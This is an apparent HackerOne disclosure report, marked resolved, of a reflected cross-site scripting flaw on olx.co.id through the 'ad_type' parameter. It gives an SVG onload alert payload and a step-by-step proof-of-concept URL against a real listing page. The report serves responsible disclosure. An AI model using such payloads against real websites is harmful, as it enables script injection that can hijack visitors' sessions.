Reflected XSS on https://www.olx.co.id/iklan/*.html via "ad_type" parameter

Disclosed: 2019-09-21 12:08:40 By littlestar To olx

Unknown

Vulnerability Details

I found Reflected XSS on https://www.olx.co.id/ - Vulnerability URL : https://www.olx.co.id/iklan/*.html - Payloads: `"><svg onload=(alert)(1)>` Proof of Concept: 1. Try to find every URL like this URL structure https://www.olx.co.id/iklan/*.html 2. And add the payloads in `ad_type` parameter, example: https://www.olx.co.id/iklan/baju-pesta-pemakaian-1x-IDzVCT1.html?ad_type=%22%3E%3Csvg%20onload=(alert)(1)%3E 3. XSS will fire up. ## Impact XSS Attack.

Actions

View on HackerOne

Report Stats

Report ID: 630265
State: Closed
Substate: resolved
Upvotes: 35

Reflected XSS on https://www.olx.co.id/iklan/*.html via "ad_type" parameter

Vulnerability Details

Actions

Report Stats

Share this report